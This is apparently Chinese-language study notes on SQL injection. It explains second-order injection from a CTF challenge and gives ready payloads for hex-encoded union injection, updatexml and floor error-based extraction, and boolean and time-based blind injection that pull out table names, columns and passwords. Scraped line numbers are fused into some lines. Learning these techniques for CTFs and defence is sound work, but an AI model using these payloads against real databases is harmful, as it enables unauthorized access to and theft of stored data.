sql二次注入原理
在第一次进行数据库插入数据的时候,仅仅只是使用了 addslashes
或 get_magic_quotes_gpc
对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来的数据,但是数据本身还是脏数据。在下一次进行需要进行查询的时候,直接从数据库中取出了脏数据,没有进行进一步的检验和处理,这样就会造成SQL的二次注入。
比如在第一次插入数据的时候,数据中带有单引号,直接插入到了数据库中;然后在下一次使用中在拼凑的过程中,就形成了二次注入。(某次比赛的payload,先注册,进去之后会显示注册的时候输入的年龄。 is_numeric函数可以用16进制绕过)1
2
3
4
5
6
7
8
9
10
11
12
13
14
15123 order by 5 # 0x313233206f7264657220627920352023
123 and union select 1,2,3,4#
0x31323320616e64203020756e696f6e2073656c65637420312c322c332c342023
123 and 0 union select 1,(select database()),3,4#
0x31323320616e64203020756e696f6e2073656c65637420312c2873656c6563742064617461626173652829292c332c3423
123 and 0 union select 1,(select group_concat(table_name)),3,4 from information_schema.tables where table_schema='qwb'# 0x31323320616e64203020756e696f6e2073656c65637420312c2873656c6563742067726f75705f636f6e636174287461626c655f6e616d6529292c332c342066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573207768657265207461626c655f736368656d613d277177622723
123 and 0 union select 1,(select group_concat(column_name)),3,4 from information_schema.columns where table_schema='qwb' and table_name='flag'#
0x31323320616e64203020756e696f6e2073656c65637420312c2873656c6563742067726f75705f636f6e63617428636f6c756d6e5f6e616d6529292c332c342066726f6d20696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265207461626c655f736368656d613d277177622720616e64207461626c655f6e616d653d27666c61672723
123 and 0 union select 1,(select flag from flag),3,4 #
0x31323320616e64203020756e696f6e2073656c65637420312c2873656c65637420666c61672066726f6d20666c6167292c332c342023
updatexml禁用concat1
2mysql> select updatexml(1,hex((select user())),1);
ERROR 1105 (HY000): XPATH syntax error: 'F6F74406C6F63616C686F7374'
updatexml中存在特殊字符、字母时,会出现报错,报错信息为特殊字符、字母及之后的内容,而hex出的数据包含字母和数字,所以第一个字母前面的内容都会丢失,updatexml报错最多只能显示32位,我们结合SUBSTR函数来获取数据就行了
可以使用下面的函数来显示1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16mysql> select updatexml(1,make_set(3,'~',(select user())),1);
ERROR 1105 (HY000): XPATH syntax error: '~,root@localhost'
mysql> select updatexml(1,lpad('@',30,(select user())),1);
ERROR 1105 (HY000): XPATH syntax error: '@localhostroot@localhostr@'
mysql> select updatexml(1,repeat((select user()),2),1);
ERROR 1105 (HY000): XPATH syntax error: '@localhostroot@localhost'
mysql> select updatexml(1,(select user()),1);
ERROR 1105 (HY000): XPATH syntax error: '@localhost'
mysql> select updatexml(1,reverse((select user())),1);
ERROR 1105 (HY000): XPATH syntax error: '@toor'
mysql> select updatexml(1,export_set(1|2,'::',(select user())),1);
ERROR 1105 (HY000): XPATH syntax error: '::,::,root@localhost,root@localh'
报错注入:
floor报错1
2
3
4
5
6
7
8
9
10
11获取数据库名:
select count(*),(concat(0x3a,database(),0x3a,floor(rand()*2))) name from information_schema.tables group by name;
获取表名:
select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;
获取字段名:
select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;
获取内容:
select count(*),concat(0x3a,0x3a,(select username from users limit 0,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;
UpdateXml报错注入1
2
3
4
5
6
7
8获取表名
select updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 3,1)),0);
获取字段
select updatexml(0,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 4,1)),0);
获取内容
select updatexml(0,concat(0x7e,(SELECT concat(password) FROM users limit 0,1)),0);
布尔盲注(无论输入什么就只有正确和错误,就是基于布尔的盲注。)
通过构造sql语句,通过判断语句是否执行成功来对数据进行猜解。1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16判断当前数据库的长度
select length(database())>7;//当>8的时候输出为0,则数据库长度为7。
查看表的长度
select length(table_name)>6 from information_schema.tables where table_schema=database() limit 0,1;
查看表名
select table_name from information_schema.tables where table_schema=database() limit 0,1;
获取表名第一个字符
select substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1) m;
获取表名第一个字符的ASCII
select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) m;
获取字段名与字段内容原理一样。
时间盲注
原理:
当对数据库进行查询操作,如果查询的条件不存在,语句执行的时间便是0,但往往语句执行的速度非常快,线程信息一闪而过,得到的执行时间基本为0。但是如果查询语句的条件不存在,执行的时间便是0,利用该函数这样一个特殊的性质,可以利用时间延迟来判断我们查询的是否存在。1
select if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97,1,sleep(5)) m;
查询语句正确是m为1,不正确是会延时5s,输出0。